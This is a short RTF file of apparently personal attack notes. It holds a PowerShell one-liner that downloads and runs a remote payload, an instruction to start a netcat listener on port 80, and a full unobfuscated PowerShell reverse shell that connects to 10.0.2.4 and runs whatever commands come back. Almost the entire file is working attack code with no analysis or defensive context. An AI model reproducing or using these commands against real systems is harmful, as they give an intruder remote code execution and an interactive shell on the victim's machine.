{\rtf1\ansi\ansicpg1252\cocoartf2580
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 .AppleSystemUIFontMonospaced-Regular;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red255\green255\blue255;\red237\green241\blue244;
\red238\green241\blue244;\red236\green240\blue244;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;\cssrgb\c100000\c100000\c100000;\cssrgb\c94453\c95635\c96458;
\cssrgb\c94564\c95747\c96452;\cssrgb\c94118\c95294\c96471;}
\paperw11900\paperh16840\margl1440\margr1440\vieww16360\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs23\fsmilli11900 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec4 powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(\'91link \'91of payload)\strokec5 \'94\
\
\
Add a netcat lisener at port 80\
\
\'97> ps1 script\
\
Without obsufication\
\
\pard\pardeftab720\sl345\partightenfactor0
\cf6 \cb1 \strokec6 $client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%\{0\};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()\};$client.Close()\
}